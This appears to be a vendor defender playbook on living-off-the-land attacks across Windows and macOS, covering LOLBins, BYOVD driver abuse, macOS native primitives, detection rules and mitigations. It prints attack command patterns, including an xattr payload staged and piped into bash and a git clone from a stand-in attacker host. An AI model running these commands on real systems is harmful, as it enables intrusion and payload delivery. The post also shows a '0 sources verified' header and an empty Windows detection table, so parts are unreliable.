What is Lyrie Research?

Lyrie Research is an autonomous cybersecurity intelligence platform publishing verified threat intelligence including critical CVEs, active exploitation reports, breach analysis, and original research — every article cross-validated by 3+ primary sources.

How does Lyrie.ai protect against rogue AI threats?

Lyrie.ai uses machine-speed autonomous defense to detect and neutralize rogue AI, prompt injection, and AI supply chain attacks. It responds before human analysts can react.

What cybersecurity topics does Lyrie Research cover?

Lyrie Research covers CVE deep dives, CISA KEV actively exploited vulnerabilities, data breach forensics, original cybersecurity research, and AI threat intelligence including agent-based attacks.

How often is Lyrie Research updated?

Lyrie Research is updated continuously by the autonomous Lyrie Sentinel engine, publishing new threat intelligence multiple times daily as new CVEs, exploits, and breaches are confirmed.

Is Lyrie Research free to access?

Yes, all articles on Lyrie Research are freely accessible. For active protection by the same intelligence engine, visit lyrie.ai.

← Defensive-Playbook Deep-Dive

0 sources verified·12 min read

By Lyrie.ai Cyber Research Division·5/6/2026

The Land Is Everywhere Now: A 2026 Defender's Playbook for Living-off-the-Land Attacks Across Windows and macOS

TL;DR

Living-off-the-land (LOTL) attacks — where adversaries use the operating system's own trusted binaries against you — have been a Windows problem for a decade. In April 2026, Cisco Talos published research proving that macOS is just as exposed, perhaps more so, because detection infrastructure barely exists for it. Simultaneously, Windows LOTL evolved: BYOVD (Bring Your Own Vulnerable Driver) weaponizes LOLBins at kernel level, killing the very EDR you rely on. The threat picture is: no custom malware, no suspicious hashes, no obvious IOCs — just certutil, osascript, mshta, and git doing things you didn't authorize. This playbook tells you what each technique looks like in telemetry, how to detect it, and how to prevent it without breaking your engineering teams.

Background: From LOLBins to LOOBins — The Evolution of Fileless Intrusion

The term LOLBins — Living Off the Land Binaries — entered the security lexicon around 2013, but the LOLBAS Project formalized it for Windows in 2018, cataloguing hundreds of native utilities that attackers routinely weaponize. The concept is simple but devastating: instead of dropping custom malware that triggers hash-based detection, attackers use the tools already pre-installed on every endpoint — certutil.exe to download payloads, mshta.exe to execute HTA scripts, rundll32.exe to load malicious DLLs, regsvr32.exe to execute COM objects.

By 2025, LOTL had become the default technique for sophisticated threat actors. CISA's Joint Cybersecurity Advisory on Volt Typhoon specifically called out LOTL as a primary tradecraft pillar for Chinese nation-state operators. Ransomware operators like Qilin use it in the initial access phase. BEC actors use it post-compromise to maintain persistence invisibly.

The security industry responded — for Windows. Every major EDR learned to flag certutil -decode, powershell.exe -encodedcommand, and wmic.exe process call create. Sigma rules proliferated. Detection matured.

Then came the macOS problem.

The macOS Blind Spot Opens Wide

On April 21, 2026, Cisco Talos published "Bad Apples: Weaponizing Native macOS Primitives for Movement and Execution" — a systematic research effort documenting what the industry had quietly known but never fully mapped: macOS has a rich set of native living-off-the-land primitives, and defenders have almost no telemetry for them.

The numbers are stark. Over 45% of organizations now use macOS as a primary platform, with Mac endpoints concentrated among the highest-value targets: developers, DevOps engineers, cloud infrastructure operators — the exact roles that hold SSH keys, cloud credentials, source code repositories, and production access. Meanwhile, the MITRE ATT&CK framework documents significantly fewer macOS techniques than Windows equivalents. EDR solutions are built around Windows process tree semantics. macOS-native IPC and automation mechanisms are largely opaque to existing security telemetry.

The community coined the term LOOBins — Living Off the Orchard Binaries — to catalog the macOS equivalents. The resource at loobins.io is the macOS answer to LOLBAS, and it's expanding rapidly.

The result: on Windows, defenders have years of detection maturity. On macOS, attackers have a near-clean room.

Technical Analysis: The Techniques You're Not Detecting

Windows LOLBins — The Classics, Now Kernel-Level

The Windows LOLBins catalog has not stood still. What changed in 2025-2026 is the escalation path.

Tier 1 — Classic User-Space Abuse:

certutil.exe -decode / -urlcache -split -f — downloading payloads, decoding base64 blobs
mshta.exe vbscript:Execute(...) — executing inline VBScript or loading remote HTA
rundll32.exe javascript:... — JavaScript execution without PowerShell
regsvr32.exe /u /n /s /i:<url> scrobj.dll — "squiblydoo" COM scriptlet execution
powershell.exe -EncodedCommand / -Exec Bypass — encoding bypasses AMSI triggers
wmic.exe process call create — WMI-based process spawning without visible command line
bitsadmin.exe /transfer — BITS-based download that persists across reboots
ieexec.exe, msiexec.exe /q /i <url> — trusted installer chains

Tier 2 — BYOVD (Bring Your Own Vulnerable Driver):

This is the 2026 escalation. LOLBins let attackers blend into user space. BYOVD kills your defenses entirely. The technique loads a legitimate but vulnerable kernel driver (often an old AV or hardware vendor driver with a known CVE) to gain kernel-mode execution. From there, attackers terminate EDR processes at kernel level by removing process-creation notification callbacks (PsSetCreateProcessNotifyRoutine), or directly killing EDR threads via ZwTerminateProcess called from Ring-0.

MITRE ATT&CK v19 — released in early 2026 — formally split Defense Evasion into Stealth and Impair Defenses, with BYOVD landing squarely under the Impair Defenses taxonomy (T1562.001). This reflects the operational reality: LOTL moves you past detection; BYOVD turns off the detector.

Known BYOVD drivers seen in 2025-2026 campaigns include outdated versions of Intel driver tools, obsolete GPU vendor utilities, and hardware monitoring tools with signed but vulnerable binaries. Because the driver is legitimately signed, kernel protection mechanisms like Driver Signature Enforcement don't fire.

macOS LOOBins — The Attack Surface Defenders Are Missing

Talos' "Bad Apples" research maps six primary native primitive categories:

1. Remote Application Scripting (RAS) — T1072 Software Deployment Tool

RAS (formerly Remote Apple Events) uses the eppc:// protocol to send AppleScript Inter-Process Communication (IPC) commands to a remote Mac. The AppleEventsD daemon processes these. Talos showed it can be abused as a standalone execution mechanism, not just lateral movement.

The key bypass: Apple blocks remote do shell script via System Events with a -10016 Handler Error. Talos found the bypass: use Terminal.app as an execution proxy, since it accepts remote do script commands and is designed for shell interaction. A single osascript -e 'tell application "Terminal" to do script "..."' sent over RAS provides arbitrary shell execution with no suspicious binary on disk.

Detection gap: Most EDRs monitor osascript invocations locally but have near-zero visibility into remotely-delivered Apple Events. The AppleEventsD process itself doesn't log commands; the executed processes appear with Terminal.app as parent.

2. Spotlight Metadata as a Payload Staging Mechanism

macOS's xattr command sets extended attributes — including Spotlight metadata (Finder comments) on files. Talos demonstrated embedding obfuscated payloads inside file metadata that survives normal file scanning because static file analysis inspects file content, not xattr fields.

xattr -w com.apple.metadata:kMDItemFinderComment "$(base64 -w0 /tmp/payload)" ./innocent.txt

The payload is retrieved by reading the attribute:

xattr -p com.apple.metadata:kMDItemFinderComment ./innocent.txt | base64 -d | bash

Traditional hash-based scanning and most YARA rules are completely blind to this. The "innocent.txt" file has a clean hash. The payload lives in metadata space.

3. Native File Transfer Protocols — Bypassing SSH Telemetry

Most macOS network monitoring focuses on SSH for lateral movement and file transfer. Talos documented four native alternatives operating entirely outside SSH visibility:

SMB (smbutil, /net use): macOS SMB client for mounting shares and transferring toolkits laterally
Netcat (nc): pre-installed on macOS for raw TCP/UDP data exfiltration or reverse shells
TFTP (tftp): trivial file transfer to/from TFTP servers; rarely monitored in enterprise telemetry
SNMP (snmpwalk, snmptrap): can be abused to exfiltrate data out-of-band through management plane protocols

None of these generate the sshd logs that most macOS-focused detection was tuned to watch.

4. Git as a Delivery Mechanism

git clone and git fetch are ubiquitous on developer endpoints. Talos showed that git can be used as a pull-based payload delivery mechanism:

git clone https://attacker-controlled-repo.com/payloads.git /tmp/.cargo-update

This is doubly dangerous: developer Macs usually have git network activity whitelisted by DLP/proxy policies, the cloned content appears as source code, and path names mimicking legitimate developer tools (.cargo-update, .npm-cache, .brew-formula) evade casual inspection.

5. SNMP-Based C2 Exfiltration

Using native snmpwalk and snmptrap to exfiltrate small data payloads over SNMP community strings. Management protocols are rarely inspected by proxy or DLP solutions configured for HTTP/HTTPS.

Detection Telemetry: What to Actually Look For

Windows LOLBins Detection Matrix

|--------|-------------------|-----------|-------------------|

BYOVD Detection:

Load of a new kernel driver that has a known CVE (cross-reference signed driver against public BYOVD lists)
SeLoadDriverPrivilege abuse by non-SYSTEM processes
EDR service termination within 60 seconds of a kernel driver load event
Registry key creation under HKLM\SYSTEM\CurrentControlSet\Services\ by non-installer process

macOS LOOBins Detection Matrix

| Technique | Telemetry Source | Detection Logic |

|-----------|-----------------|-----------------|

| RAS / osascript remote | Unified Log (log stream) | AppleEventsD spawning Terminal.app with do-script event from remote IP |

| Spotlight metadata staging | FSEvents + xattr auditing | File opened → xattr set on same file with base64 content exceeding 100 bytes |

| nc shell | Network telemetry | Outbound TCP to non-standard port by nc process, especially from Terminal.app parent |

| tftp data transfer | Network telemetry | TFTP to external IP from a workstation (not a management host) |

| git clone payload | EDR process tree | git clone to external non-allowlisted domain by bash/sh child process |

| snmptrap exfil | Network telemetry | Outbound SNMP trap to non-management host IP |

Baseline rule: On macOS, any of these native binaries spawned with a parent of Terminal.app, bash, or zsh that is itself a child of an unexpected process (Slack, browser, document handler) is high-fidelity lateral movement signal.

IOCs and Behavioral Signatures

Windows BYOVD Known Vulnerable Drivers (current 2026 campaigns):

rtcore64.sys (MSI Afterburner, CVE-2019-16098) — still widely used in BYOVD attacks
dbutil_2_3.sys (Dell DBUtil, CVE-2021-21551)
gdrv.sys (GIGABYTE, CVE-2018-19320)
AsrDrv104.sys (ASRock, CVE-2020-15368)
Any kernel driver with SeLoadDriverPrivilege loaded from temp/user-writable path

macOS LOOBins process tree signatures:

(Slack.app|Discord.app|Zoom.app) → bash/zsh → osascript
(Mail.app|Safari.app) → sh → nc / tftp / git
Terminal.app spawned by AppleEventsD with remote IP source
xattr write ≥512 bytes on .txt/.pdf/.dmg file by shell process

Network IOCs (LOTL generic):

certutil.exe DNS queries to non-Microsoft domains
BITS transfer to non-WSUS/CDN IPs
TFTP (UDP 69) from workstation IPs
SNMP trap (UDP 162) from workstation to non-NMS IPs

Lyrie Take

LOTL is where malware detection philosophy completely breaks down. Your entire signature-based pipeline — hash checking, YARA, AV — is irrelevant because there's nothing to hash. The attacker is your OS.

The strategic failure most enterprises are making in 2026 is Windows-only parity on LOTL detection. Years of maturity on LOLBins got built into EDRs, SIEMs, and threat hunt playbooks — exclusively for Windows. Mac fleets got a pass because "Macs don't get attacked." That era ended. Cisco Talos cataloguing RAS-via-Terminal.app and xattr-staging on April 21 is the formal notice.

The BYOVD threat is the other underappreciated escalation. Defenders who invested heavily in EDR are learning that BYOVD inverts the assumption: the endpoint protection is the target. When an attacker's kernel driver terminates your EDR's telemetry thread before you see anything, your investment in endpoint detection is worth zero for that kill chain segment. This is why network-based behavioral detection — watching what the machine does, not what runs on it — is the necessary complement.

Lyrie's autonomous approach to this threat class operates at the behavioral graph layer rather than the file/process layer. A lateral movement pattern by git or nc or tftp from a developer workstation shows up in the cross-endpoint behavioral graph even when the endpoint sensor sees nothing unusual — because the network sees the SNMP trap to an unexpected IP, the EDR on the receiving host sees an unexpected SMB mount, and the authentication logs show a service account that hasn't been used in 30 days suddenly authenticating. No single sensor catches it. The graph does.

Defender Playbook

Tier 1 — Immediate (No-Regret Actions)

Windows:

1. Deploy Sigma rules for top-10 LOLBins — LOLBAS-Project maintains community rules; deploy them in your SIEM for certutil, mshta, rundll32, regsvr32, bitsadmin, wmic. Filter out legitimate usage (WSUS, software deployment) using process tree context.

2. BYOVD blocking — Enable Microsoft's vulnerable driver blocklist (HVCI + WDAC driver policy). Update it. The default blocklist in Windows 11 22H2+ is a start; add your own known BYOVD drivers.

3. Attack Surface Reduction (ASR) rules — Enable rules blocking Office applications from spawning processes, blocking child processes from Lsass, and blocking executable content from email/web.

4. Constrained Language Mode for PowerShell — Enables AppLocker or WDAC enforcement that breaks most PowerShell LOTL chains.

macOS:

1. MDM-disable Remote Apple Events globally — Unless you have a documented need, disable RAS in your MDM profile (com.apple.RemoteAppleEvents restriction). This eliminates the Talos RAS attack surface entirely.

2. Disable TFTP and SNMP services on all workstations via MDM configuration profile.

3. Restrict nc execution — If nc is not required for developer workflows, create a configuration profile that prevents execution via the Application Launch Constraints introduced in macOS Ventura+.

4. Enable FSEvents auditing with xattr monitoring — eslogger (macOS Endpoint Security Framework) can capture xattr write events; forward them to your SIEM and alert on large base64-encoded xattr values.

Tier 2 — Detection Infrastructure

5. Process lineage monitoring for macOS — Configure your EDR (CrowdStrike Falcon for Mac, SentinelOne Singularity for Mac) to flag osascript or Terminal.app spawned from communication apps (Slack, Zoom, Teams, Mail).

6. Network behavioral baseline for LOTL protocols — In your NDR (network detection and response), alert on TFTP from workstation IP range, SNMP traps from non-management hosts, BITS transfers to IPs outside your software distribution whitelist.

7. LOOBins-aware threat hunt — Download and import the LOOBins.io YAML catalog. Map each technique to your current EDR/SIEM coverage. Identify gaps and write hunt queries for uncovered techniques.

8. Git clone monitoring — If your developer fleet doesn't legitimately clone from arbitrary external domains, add a network rule alerting on git clone to non-allowlisted domains. At minimum, log all git network connections for 30-day retrospective hunting.

Tier 3 — Architecture

9. Privileged Access Workstations (PAWs) for DevOps — Developer endpoints are the highest-value LOTL pivot points. Segment them: engineers who need production credentials should operate from hardened PAW VMs, not their daily-driver Mac where Slack, browser, and kubectl all live in the same process space.

10. Just-in-Time (JIT) credential access — The reason LOTL lateral movement works is credentials are present on the endpoint. Solutions like BeyondTrust, CyberArk, or Teleport issue time-bounded credentials that expire. Stolen via LOTL, they're useless after the window.

11. Immutable endpoint logging via MDM — On macOS, use the Endpoint Security Framework to stream security events to an immutable, off-device log store. An attacker using LOTL can potentially tamper with local logs; off-device streaming via ESF is harder to cover.

12. Cross-platform behavioral graph — Invest in detection capability that correlates across Windows and macOS endpoints, network, and identity. The LOTL attacker's footprint spans all three; single-plane detection misses the pattern.

Sources

1. Cisco Talos — "Bad Apples: Weaponizing Native macOS Primitives for Movement and Execution" (April 21, 2026): https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/

2. Andrea Fortuna — "Living off the orchard: understanding LOOBins and native macOS attack techniques" (April 29, 2026): https://andreafortuna.org/2026/04/29/living-off-the-orchard-understanding-loobins-macos-attack-techniques/

3. Critical Path Security — "Monthly Threat Brief: April 2026": https://www.criticalpathsecurity.com/monthly-threat-brief-april-2026/

4. LOOBins Project: https://www.loobins.io/

5. LOLBAS Project (Windows): https://lolbas-project.github.io/

6. GTFOBins (Linux): https://gtfobins.github.io/

7. Hive Security — "MITRE ATT&CK v19: Defense Evasion Is Dead — Meet Stealth and Impair Defenses" (2026): https://hivesecurity.gitlab.io/blog/mitre-attack-v19-defense-evasion-split-stealth-impair-defenses/

8. CISA Joint Cybersecurity Advisory — Volt Typhoon LOTL tradecraft (2024-2025 series)

Lyrie.ai Cyber Research Division — Senior Analyst Desk